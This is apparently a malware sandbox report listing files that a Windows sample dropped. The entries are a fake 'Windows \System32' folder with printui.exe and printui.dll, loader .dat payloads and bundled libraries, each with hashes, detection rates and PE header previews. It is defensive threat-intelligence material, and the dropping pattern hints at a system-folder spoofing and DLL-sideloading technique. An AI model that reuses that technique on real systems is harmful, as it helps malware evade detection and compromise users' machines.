                                                                                                                              SHA-512:5D72F64B8E5C42A3C9A7BCBBE8A1598A85402ADE4F312AB9E26869F8B39952A3AA037F2CF7DA89E686C5BC3FCB221FEEAE077B9FFD2EEF98DAC0E307637FE7BD
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Joe Sandbox View:
                                                                                                                              • Filename: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, Detection: malicious, Browse
                                                                                                                              • Filename: app64.exe, Detection: malicious, Browse
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b...&.i.&.i.&.i./.....i.6qh.%.i.6q..".i.6qj.%.i.6qm...i.6ql.*.i.Vth.$.i.&.h...i.npm.).i.npi.'.i.np..'.i.&...'.i.npk.'.i.Rich&.i.........PE..d...a..f.........." ...)..................................................................`..........................................O......@W..........P....p..@...............l....>..T...........................`=..@...............x............................text............................... ..`.rdata...l.......n..................@..@.data........`.......L..............@....pdata..@....p.......N..............@..@.rsrc...P............Z..............@..@.reloc..l............`..............@..B........................................................................................................................................................................................................................................

                                                                                                                              C:\Windows \System32\printui.dll (copy)

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\curlapp64.exe
                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):17375232
                                                                                                                              Entropy (8bit):7.999975126323966
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:393216:sVzO4uGT4pZjC0MMi9t/I85d4rN9+EC+NhbuJHCa:slLum4/jMvJbd47DC+vbuga
                                                                                                                              MD5:A2D2E1A778727BB4D04F1186B3E35BFD
                                                                                                                              SHA1:F8C91FDC30DAB61111AA5655E97B3E0E8AE3E372
                                                                                                                              SHA-256:5B9E8C091D03A9E0F078C9B949EB6650315ACA2AE6912A8885F1F4FA656700FE
                                                                                                                              SHA-512:AD69762097EB5A7AFE877AEB020039947964483774A8DEBFC4F987A389D3AECFA50311F05AE97B5C2ECF2C782F58A82B2B4BBCB0A69EA9ACE682D896A3964E3C
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 27%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{...{...{.......~...{...j.......z.......z.......z.......z...Rich{...........PE..d....pUg.........." ...*.*.......... $.......................................P............`.........................................PH..L....H..<............@..P...................xD..8............................................@...............................text....(.......*.................. ..`.rdata.......@......................@..@.data...I....P.......:..............@....pdata..P....@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\Windows \System32\printui.exe

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\curlapp64.exe
                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):64000
                                                                                                                              Entropy (8bit):6.336447440888565
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:a4uHmXrH60qKdC5vI1iQfCIWVM9G4qW4ne+S/ly+PKAoXRZX6fbX57UWkCRPPA7f:Uca1KAVIPd4n+lbeRZIbSQPPA7f
                                                                                                                              MD5:2FC3530F3E05667F8240FC77F7486E7E
                                                                                                                              SHA1:C52CC219886F29E5076CED98D6483E28FC5CC3E0
                                                                                                                              SHA-256:AC75AF591C08442EA453EB92F6344E930585D912894E9323DB922BCD9EDF4CD1
                                                                                                                              SHA-512:EF78DE6A114885B55806323F09D8BC24609966D29A31C2A5AE6AD93D1F0D584D29418BA76CA2F235ED30AD8AE2C91F552C15487C559E0411E978D397C82F7046
                                                                                                                              Malicious:false
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y..........................................................................Rich....................PE..d...0.sA.........."............................@.............................@.......E....`.......... .......................................'.......P.......@...............0..$...P$..T............................ ..............(!...............................text............................... ..`.rdata....... ......................@..@.data...x....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..$....0......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                              C:\Windows\System32\bav64.exe

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3193856
                                                                                                                              Entropy (8bit):5.349410511166106
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:gPhW/klN1ABckHPh7qnMzKfIkl48gA2gpH5WPpF7L96bqhL:yIkR/qh
                                                                                                                              MD5:DBE920F6626DB0DDCC757F787C855DF4
                                                                                                                              SHA1:07A1CFD078DC338B683FEF52EEC49949287F00E7
                                                                                                                              SHA-256:00B3ECBFEED2995F4F6CBFA2B27A8B1AB7886FCFBC9AA53DE9C6E936258753AC
                                                                                                                              SHA-512:08C96CFB441EBA851D6C90F6710E05AE0541FBBFA257DAFDCF0B2DA2257EDF90258DD2011746A22A9080D512849D93B72A2B6D33F07A1301BF7DF9C788BF9941
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m...m...m....O.......O.......O..e...}J..g...}J..|...}J.......O..f...m........O..l...&K..l...&K..l...&K..l...Richm...................PE..d... .*g.........."....).~$..f......R..........@..............................B...........`................................................. .A.x.... B.F.....@.(............0B..... .<.8.............................<.@.............A. ............................textbss.=...............................text....}$..P...~$................. ..`.rdata........5.......$.............@..@.data....[....?..0...H..............@....pdata........@......x..............@..@.idata........A.. ...D0.............@..@.msvcjmcd.....A......d0.............@....00cfg..u.....B......h0.............@..@.fptable3.....B......j0.............@....rsrc...F.... B......n0.............@..@.reloc..sG...0B..H...t0.............@..B................................

                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):64
                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                              Malicious:false
                                                                                                                              Preview:@...e...........................................................

                                                                                                                              C:\Windows\System32\console_zero.exe

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):664576
                                                                                                                              Entropy (8bit):6.597433055098113
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:JKDPkqL1NxW6CDBPXRiD2xTph0lhSMXli6Yuej+4M7:JQhN+9PXYDQh0lhSMXlpYuej+
                                                                                                                              MD5:A11604F5C925DDAADF2988AF05F4071B
                                                                                                                              SHA1:8386D55390E0C9B45BEF2EDC18A578266E6745F0
                                                                                                                              SHA-256:4F0C445628E2DC8D1E2409687CADF5EBCC7306747EDF3C9DC80011E9D8D01905
                                                                                                                              SHA-512:06E4B8B88CE6445B4F32E01BE11B24CCE71CCA4B2D1040A02517697EA779C04C85ACDACE380D52B919658723AC85F3F35E68E4C0B49BEB38602945902F0B1055
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~....yV..yV..yV..|Wz.yV..}W..yV..zW..yV.zW..yV.}W..yV.|W..yVT.xW..yV..xW..yV..xVH.yVT.pW..yVT..V..yVT.{W..yVRich..yV........................PE..d....:Sg.........."....*..... ......p..........@..........................................`.................................................L...P....`...........L...........p..T...0...8...............................@............0...............................text............................... ..`.rdata..8....0......................@..@.data....3..........................@....pdata...L.......N..................@..@.fptable.....P......................@....rsrc........`......................@..@.reloc..T....p......................@..B........................................................................................................................................................................................

                                                                                                                              C:\Windows\System32\libcrypto-3-x64.dll

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4684800
                                                                                                                              Entropy (8bit):6.761708409908653
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:98304:E1+WtBcda7nzo7Vd8qQQPQ1CPwDvt3uFGCC:gXtBcda7nzo7Vd8qQQY1CPwDvt3uFGCC
                                                                                                                              MD5:158F0E7C4529E3867E07545C6D1174A9
                                                                                                                              SHA1:9FF0CCCB271F0215AD24427B7254832549565154
                                                                                                                              SHA-256:DCC1FA1A341597DDB1476E3B5B3952456F07870A26FC30B0C6E6312764BAA1FC
                                                                                                                              SHA-512:51E79D8D0AB183046F87AA659973B45147BB1E1AE8883F688C615CCB18BF9FCCB8779DD872B01748BACD56E141BC096C2BB4CCF32EBD7A49ADC76363355E40FE
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............vI..vI..vI..I..vI;DwH..vI;DsH..vI;DrH..vI;DuH..vI..wI*.vI..wH..vI..vI..vI.GrHl.vI.GvH..vI.G.I..vI.GtH..vIRich..vI........PE..d...d.Lf.........." ...'..4..........4.......................................G...........`...........................................A. ... @D.@....0G.......D.LH...........@G.L.....?.T.............................?.@.............4..............................text...8.4.......4................. ..`.rdata..*.....4.......4.............@..@.data....t...`D..J...JD.............@....pdata..LH....D..J....D.............@..@.rsrc........0G.......F.............@..@.reloc..L....@G.......F.............@..B................................................................................................................................................................................................................................................

                                                                                                                              C:\Windows\System32\libcurl.dll

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):588800
                                                                                                                              Entropy (8bit):6.3852695857936554
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:1dkYvMQmNkYBasGpIFetxo8u3zTkIXmaKSTQP76NuudqbaRArq:1zvMQmmYB4KQ7nu3zuSTQP76NuudqbaF
                                                                                                                              MD5:18CE47F58B4C1A9CFC1EDF7C8BF49B7C
                                                                                                                              SHA1:E74D08AB06ED8200D7E674D8031D6DF8250DE8CB
                                                                                                                              SHA-256:36D97F1C254832CEE9698CEA2F1A63EA98D231641FD29715EF581BE103ACE602
                                                                                                                              SHA-512:19B2D6968095C4E8F08C66AB73E7EC5E0439712BCB2777266602EF2AD123A779395A3D44BC0C7C9945376998FB2165BC60E6BF682863A55A0CFF40C720594BDD
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............|.X.|.X.|.X...X.|.X...Y.|.X..`X.|.X...Y.|.X...Y.|.X...Y.|.X...Y.|.X.|.Xh|.X...Y.|.X...Y.|.X...Y.|.X..bX.|.X.|.X.|.X...Y.|.XRich.|.X........................PE..d...o..f.........." ...).....`......@........................................0............`..........................................Q..$...4[..T................Z........... ..0... ...T...............................@...............`............................text.............................. ..`.rdata..D...........................@..@.data....1...p...*...d..............@....pdata...Z.......\..................@..@.rsrc...............................@..@.reloc..0.... ......................@..B................................................................................................................................................................................................................

                                                                                                                              C:\Windows\System32\libiconv-2.dll

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1851113
                                                                                                                              Entropy (8bit):6.295735352298234
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:SAlxpPnBAUZLY9OVbbTiZGavkg3NyeuQ6l9fH+f2ykqZrkgecviRd7mQFz:DPnBAUZLY9OEZGaXBuQQ9e2YYUQFz
                                                                                                                              MD5:158BC77453D382CF6679CE35DF740CC5
                                                                                                                              SHA1:9A3C123CE4B6F6592ED50D6614387D059BFB842F
                                                                                                                              SHA-256:CF131738F4B5FE3F42E9108E24595FC3E6573347D78E4E69EC42106C1EEBE42C
                                                                                                                              SHA-512:6EB1455537CB4E62E9432032372FAE9CE824A48346E00BAF38EF2F840E0ED3F55ACAEE2656DA656DB00AE0BDEF808F8DA291DD10D7453815152EDA0CCFC73147
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...8.Jd....q.....& ..."............P..........f............................................. .................................................D....@..........d............P..................................(.......................p............................text..............................`.P`.data...............................@.P..rdata..............................@.`@.pdata..d...........................@.0@.xdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..D...........................@.0..CRT....X.... ......................@.@..tls.........0......................@.@..rsrc........@......................@.0..reloc.......P......................@.0B/4...... ....`......................@..B/19.....m....p... ..................@..B/31......2.......4..................@..B/45.....

                                                                                                                              C:\Windows\System32\libintl-9.dll

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):475769
                                                                                                                              Entropy (8bit):5.442192544327632
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:YoSRYqB/kDraXbQTNRC6RsclS8DzT6Bam:+YY/kDraLQTNRCPWDzT6Bam
                                                                                                                              MD5:E79E7C9D547DDBEE5C8C1796BD092326
                                                                                                                              SHA1:8E50B296F4630F6173FC77D07EEA36433E62178A
                                                                                                                              SHA-256:1125AC8DC0C4F5C3ED4712E0D8AD29474099FCB55BB0E563A352CE9D03EF1D78
                                                                                                                              SHA-512:DBA65731B7ADA0AC90B4122C7B633CD8D9A54B92B2241170C6F09828554A0BC1B0F3EDF6289B6141D3441AB11AF90D6F8210A73F01964276D050E57FB94248E2
                                                                                                                              Malicious:false
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......[.H........& .....D....................(h....................................0......... ......................................................@..8....................P..p........................... 0..(....................................................text...8C.......D..................`.P`.data........`.......J..............@.`..rdata..0M...p...N...L..............@.`@.pdata..............................@.0@.xdata..d...........................@.0@.bss....P.............................`..edata..............................@.0@.idata..............................@.0..CRT....X.... ......................@.@..tls....h....0......................@.`..rsrc...8....@......................@.0..reloc..p....P......................@.0B/4...........`......................@.PB/19..........p......................@..B/31.....1:.......<..................@..B/45.....

                                                                                                                              C:\Windows\System32\libpq.dll

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):327168
                                                                                                                              Entropy (8bit):6.055910692008984
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:veJ/i9L1mle2NwGTQ46ZEEKN4zP2/SHzI4l/4OMx7apSPIYuh0L/iXmJ:gmV2NwQQ3G4zP22rOIy
                                                                                                                              MD5:EF060E5C414B7BE5875437FF2FB8EC54
                                                                                                                              SHA1:6DCF04DFF9B25BE556EC97660F95ACF708C0C870
                                                                                                                              SHA-256:E6ACED8D30471F35B37ABBF172CE357B6A8F18AF5FEB342B6CFFC01D3378F2B4
                                                                                                                              SHA-512:67BFF321BA901A0B0DC0F6C4A723D7DF35418F593E16E6193673CCE5190D76355409F676C1EA5D0CB46493F5735209089A3A52D3D716EB8187BF6E846792E2E8
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........t3R..`R..`R..`[..`D..`To.aP..`To.`T..`To.a_..`To.aZ..`To.aV..`...a^..`n..aU..`R..`K..`=o.ag..`=o.aS..`=o.`S..`R.`S..`=o.aS..`RichR..`........................PE..d.....:f.........." ...&.l...........e.......................................@............`...@...................................................... ..........,"...........0.......k..T...........................pj..@...............p............................text...xj.......l.................. ..`.rdata..vT.......V...p..............@..@.data...............................@....pdata..,".......$..................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................

                                                                                                                              C:\Windows\System32\libssl-3-x64.dll

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):818176
                                                                                                                              Entropy (8bit):6.269258421632734
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:NGbc08emtUas2F158w1T4qLgl85MNRlqnZ5ydEVB3i:NGoL9W0lJ5cR9dEVB3
                                                                                                                              MD5:69D0FEE0CC47C3B255C317F08CE8D274
                                                                                                                              SHA1:782BC8F64B47A9DCEDC95895154DCA60346F5DD7
                                                                                                                              SHA-256:BA979C2DBFB35D205D9D28D97D177F33D501D954C7187330F6893BB7D0858713
                                                                                                                              SHA-512:4955252C7220810ED2EACA002E57D25FBC17862F4878983C4351C917CF7873EB84AE00E5651583004F15A08789BE64BDB34FF20CB0E172C9C1376706DEB4AA1A
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...q..q..q..x.'.c...O..s...O..|...O..y...O..u..:...u...L..r..q..*...L......L..p...LK.p...L..p..Richq..................PE..d...d.Lf.........." ...'..................................................................`..........................................0...K...{..................Hr..............\.......T...............................@............................................text...X........................... ..`.rdata..L...........................@..@.data...8=.......8..................@....pdata..Hr.......t..................@..@.rsrc................`..............@..@.reloc..\............d..............@..B........................................................................................................................................................................................................................................

                                                                                                                              C:\Windows\System32\libwinpthread-1.dll

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):52736
                                                                                                                              Entropy (8bit):5.840253326728635
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:fE20UsQSmxsJ/jPxsiFFnoCImovqcyz88rtYNChvThLaim3Yu/g/D8:cis0sP5FBQ7vU9BYshtaim3Yuo78
                                                                                                                              MD5:9DC829C2C8962347BC9ADF891C51AC05
                                                                                                                              SHA1:BF9251A7165BB2981E613AC5D9051F19EDB68463
                                                                                                                              SHA-256:FFE2D56375BB4E8BDEE9037DF6BEFC5016DDD8871D0D85027314DD5792F8FDC9
                                                                                                                              SHA-512:FD7E6F50A21CB59075DFA08C5E6275FD20723B01A23C3E24FB369F2D95A379B5AC6AE9F509AA42861D9C5114BE47CCE9FF886F0A03758BFDC3A2A9C4D75FAB56
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....|.....................d.............................P................ ......................................................0..P....................@..h........................... ..(....................................................text...({.......|..................`.P`.data...............................@.P..rdata..............................@.P@.pdata..............................@.0@.xdata..............................@.0@.bss..................................p..edata..............................@.0@.idata..............................@.0..CRT....`...........................@.@..tls....h.... ......................@.`..rsrc...P....0......................@.0..reloc..h....@......................@.0B................................................................................................................................

                                                                                                                              C:\Windows\System32\svcldr64.dat

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):17358848
                                                                                                                              Entropy (8bit):6.404640505323237
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:393216:jPsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRC9ETQP76NuudqeZyFZHSdEVB3:jITkg
                                                                                                                              MD5:DC1130797B2661AC54DA728D9D26D433
                                                                                                                              SHA1:731542701D282E8E69595FD95154F14999B00CDB
                                                                                                                              SHA-256:4121A5FBCA33176256997F4B6F23352D39D68EC13967A45A03A0CDA056FAFF3A
                                                                                                                              SHA-512:2C04DF1F744ACAE8BA113C37A740CED87F3EEEFBD071140FF369E4F5986E996F15F514FE416C02CB573596652E1CD9CD725058608E021D007100AD9CD1E466F6
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t...[..[..[...ZB..[...Z...[...Z..[.).Z..[.).Z..[.).Z...[...Z..[..[x..[l).Z..[l).[..[l).Z..[Rich..[........PE..d....pUg.........." ...*.$...................................................@............`.....................................................<.... ...........,...........0.......A..8...........................p@..@............@..H............................text....".......$.................. ..`.rdata...e...@...f...(..............@..@.data....*..........................@....pdata...,..........................@..@.fptable............................@....rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................

                                                                                                                              C:\Windows\System32\ucrtbased.dll

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1786880
                                                                                                                              Entropy (8bit):6.056894707447503
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:JUV0C8E3W4JoceLErS6P0qoc6uoPrT5PgVBHmaw+zrGOzli7Gi0m9ZRXyYk:i8/B90ozghlGJ7js
                                                                                                                              MD5:C3130CFB00549A5A92DA60E7F79F5FC9
                                                                                                                              SHA1:56C2E8FB1AF609525B0F732BB67B806BDDAB3752
                                                                                                                              SHA-256:EEE42EABC546E5AA760F8DF7105FCF505ABFFCB9EC4BF54398436303E407A3F8
                                                                                                                              SHA-512:29BAB5B441484BDFAC9EC21CD4F0F7454AF05BFD7D77F7D4662AEAEAA0D3E25439D52AA341958E7896701546B4A607D3C7A32715386C78B746DFAE8529A70748
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'.S.c.=.c.=.c.=.j...P.=.c.<...=..}.b.=..}.S.=..}.'.=..}...=..}.u.=..}.b.=..}.b.=.Richc.=.........PE..d...~.!U.........." .................................................................g....`A........................................p........C..................x................... ...............................`...................H............................text............................... ..`.rdata...x.......z..................@..@.data...(Z...`...$...J..............@....pdata..x............n..............@..@.rsrc................2..............@..@.reloc...............8..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                              C:\Windows\System32\vcruntime140d.dll

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):131920
                                                                                                                              Entropy (8bit):6.0574531251583865
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:QB6NlnzaWMj6FBknM+eHLEQE9gHAWdwfP5sd4Sohg7vMHvqZecb399R0BqZEBFP:QBYl5MOcM1HAb1wM0ecb39/0BqZEjP
                                                                                                                              MD5:F57FB935A9A76E151229F547C2204BBA
                                                                                                                              SHA1:4021B804469816C3136B40C4CEB44C8D60ED15F5
                                                                                                                              SHA-256:A77277AF540D411AE33D371CC6F54D7B0A1937E0C14DB7666D32C22FC5DCA9C0
                                                                                                                              SHA-512:CD9FC3FC460EBA6A1B9F984B794940D28705ECB738DF8595C2341ABE4347141DB14A9FF637C9F902E8742F5C48BBB61DA7D5E231CC5B2BAD2E8746C5A3E3E6ED
                                                                                                                              Malicious:false
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........].AB<..B<..B<....h.@<....L.A<..B<..l<..yb..I<..yb..V<..yb..Z<..yb..C<..yb\.C<..yb..C<..RichB<..................PE..d....LZW.........." .....j...\......pg....................................... ...........`A...........................................4.......<.......................P?......t...p...T...........................................................................text....h.......j.................. ..`.rdata..F5.......6...n..............@..@.data...............................@....pdata..............................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..t...........................@..B........................................................................................................................................................................................................................

                                                                                                                              C:\Windows\System32\winsvcf\winlogsvc

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):400
                                                                                                                              Entropy (8bit):7.4570213711387385
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:qm4BYhVXAst2cx7OxeM5Uww4BN/Qfxsmhhaw:qmYyX2CM5r/Xmhhaw
                                                                                                                              MD5:5B5E3152B3862FB64A11F90D69D3F481
                                                                                                                              SHA1:BF9F3A4201897A77F41E5434B128317C43C9EBAF
                                                                                                                              SHA-256:6F974DA1622596197B659CBC9E7D5D0BB3AA497B3330C73066A4D873DABB5EC7
                                                                                                                              SHA-512:3D51A384D25604ADFED6D13E04B5D369C3AAC957E908B887014700F24FF9762BA13DC0BFA8689572AEA3C74963CA6F6679762DE132148114097554D1CDBAF239
                                                                                                                              Malicious:false
                                                                                                                              Preview:.....S.N....A....N...-.p...Hbx.Q...Q.=L.4#V.s...N..)...+c...._.;.j;....+.q....4.S..c.\.X.. .$.ba.t.*..x.-3..M..a..+.A...#.........Pq9..i..ET.B..A..PP...p-...Y,.9"./oc.|\.H&..<{..5..c^..K..#...../..'a.S....[.....hZ.........3....{.].\;a}.n...t...'.=_!.A.....?.=Kq....g.....S....F..N._...>..MZ"....0a.9.f~.a.]...n..f.@NB....4.*..E..9..{#b.w..x...Q.Y./...b.[F.h........h....Y(..T.m...

                                                                                                                              C:\Windows\System32\x610437.dat

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1942528
                                                                                                                              Entropy (8bit):6.556537842003726
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:hwi2L2FteBN/9f+h0lhSMXlyfewf6oV9h0lhSMXln98GzsiP8GLC8h0lhSMXl8zP:hwi2aGxrmewfv01P8NBMdV
                                                                                                                              MD5:3CAA0B1816E151EF0416D4C76AB83F5F
                                                                                                                              SHA1:DC71D8A96797BFE0E4A8965CF50AB90AF4809FD8
                                                                                                                              SHA-256:02D8C3462AB0A04375AB72739C11B112BEBF434E7A6FA0796839DA4B74B6F6B2
                                                                                                                              SHA-512:9419450A7C6E0B49C5B19AC4493199DECF718AE0E2D28E9504C8A69B3E38B29A13495FE1F3DAA2B4DA6C1D642D880E50FEF92DC467B5926A5B80C2960D6A1B1A
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......l4.v(U.%(U.%(U.%Z.$.U.%Z.$.U.%9.$"U.%9.$&U.%9.$HU.%..$*U.%Z.$<U.%8.$%U.%G.$*U.%Z.$'U.%(U.%#T.%..$9U.%..$)U.%..z%)U.%..$)U.%Rich(U.%................PE..d....:Sg.........." ...*.8..........,.....................................................`.............................................P...`................P..`x..................`...8.......................(... ...@............P...............................text....6.......8.................. ..`.rdata......P.......<..............@..@.data...LO.......0..................@....pdata..`x...P...z..................@..@.fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................

                                                                                                                              C:\Windows\System32\zlib1.dll

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows \System32\printui.exe
                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):90624
                                                                                                                              Entropy (8bit):6.509332615593886
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:Wc9wKxbEwda1CzUbFfbpVxyRyxpGTlKAbe6IOcIOZyyFz5o9X2153:7uKxbEwUEAhbprCOGTKISZyuVo9GT
                                                                                                                              MD5:F53D1EFEA4855DA42DA07DE49D80BA68
                                                                                                                              SHA1:920349F4BD5A5B8E77195C81E261DFA2177EB1EE
                                                                                                                              SHA-256:7E9F43688189578042D791E3E5301165316EDC7C1ED739E0669C033A3CA08037
